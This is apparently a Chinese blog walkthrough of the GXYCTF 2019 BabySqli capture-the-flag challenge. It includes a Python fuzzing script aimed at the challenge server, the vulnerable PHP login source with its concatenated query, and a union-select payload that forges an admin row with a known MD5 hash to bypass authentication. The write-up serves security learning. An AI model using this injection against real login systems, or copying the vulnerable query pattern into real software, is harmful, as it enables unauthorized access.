[GXYCTF 2019]BabySqli

最新推荐文章于 2024-02-05 14:00:03 发布
最新推荐文章于 2024-02-05 14:00:03 发布
阅读量315 收藏 2
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129739172
版权

1.打开环境,显然是sql注入。

试了一下发现注入点在username:

进行fuzz测试:

python脚本:

import requests
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}
for i in fuzz:
    data={
        'name':i,
        'pw':1
    }
    res = requests.post(url='http://1.14.71.254:28297/search.php',data=data)
    if 'do not hack me!'  in res.text:
        print(i)

 结果:

C:\Users\zy\AppData\Local\Programs\Python\Python39\python.exe "C:\networkSafe\脚本\fuzz (2).py" 
'1'='1'
xor
rand()
CAST()
ord
=
order
concat_ws()
(
oorr
information_schema.tables
for
)
format
or
floor

进程已结束,退出代码0

过滤了(),database(),无法进行爆库,所以只能想是否存在admin用户,发现回显wrong pass.

在源码中有提示:

经过base32和base64解密后可得:

select * from user where username = '$name'

2.此时可以利用sqli的特性,当查询一个不存在的表时会创建一个虚拟的表,且当查询原题源码时发现它会将pwMD5加密与库中数据比较,在sqli中,数据库密码一般以MD5加密或明文存放。

源码:

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
	function stripslashes_deep($value)
	{
		$value = is_array($value) ?
		array_map('stripslashes_deep', $value) :
		stripslashes($value);
		return $value;
	}

	$_POST = array_map('stripslashes_deep', $_POST);
	$_GET = array_map('stripslashes_deep', $_GET);
	$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
	$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

?>

所以有payload:

name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123

ha0cker
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
[GXYCTF2019]BabySQli
pakho_C的博客
02-11 2400
web第29题 [GXYCTF2019]BabySQli 打开靶场: 源码: 一个简单的登录页面,首先直接尝试输入单引号’ 报错,那必然存在sql注入 永真式进行登录 得到这个页面,在源码中发现一个像是加密后的数据,在解码器中进行解码尝试 得到base32解码出来的文本很像base64加密后的数据,进行二次解码 果然有发现,给出了查询的语句,从user表中查询username为表单中提交的用户名的数据,应该就是页面回显的内容 永真式登录失败说明做了过滤,尝试双写绕过 依然失败 直接fuzz
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2618
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
GXYCTF2019--BabySQli
Oavinci的博客
06-28 695
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
用c#+sqlsever2005做的超市管理系统,暑假的课程设计。
[GXYCTF2019]BabySQli 解题思路&过程
NickWilde233的随笔
10-19 4697
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF2019]BabySQli1-BUUCTF
最新发布
chinese_cabbage0的博客
02-05 659
主要是一个buuctf题目的解题过程,大家可以参考一下
BUUCTF [GXYCTF2019]BabySQli实战
永远是少年
12-14 544
今天继续给大家介绍CTF刷题,本文主要内容是BUUCTF [GXYCTF2019]BabySQli实战。 一、题目基本情况 二、解题思路 三、题目评析
BUUCTF [web专项30][GXYCTF2019]BabySQli
yanglinchiji的博客
11-07 121
我的思路是去用union select查询列数,然后尝试username在哪个列,然后再注入临时用户数据。mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5。发现这是一句用来查询 我们提交的用户名的数据(应该没什么操作空间)可以使用union select来查询列数,那就再次增加列数来尝试。经过测试解码,解码顺序是:base32解码->base64解码。注意:这里的第三列用的是123进行md5转换后的数据,因为。双写绕过也错误,那就换个联合查询看看能不能查出来。
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2348
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码的哈希值。在第三个引用中,进行了一个简单的测试,通过联合查询将用户名设置为'zhangsan'并选择了一些假数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值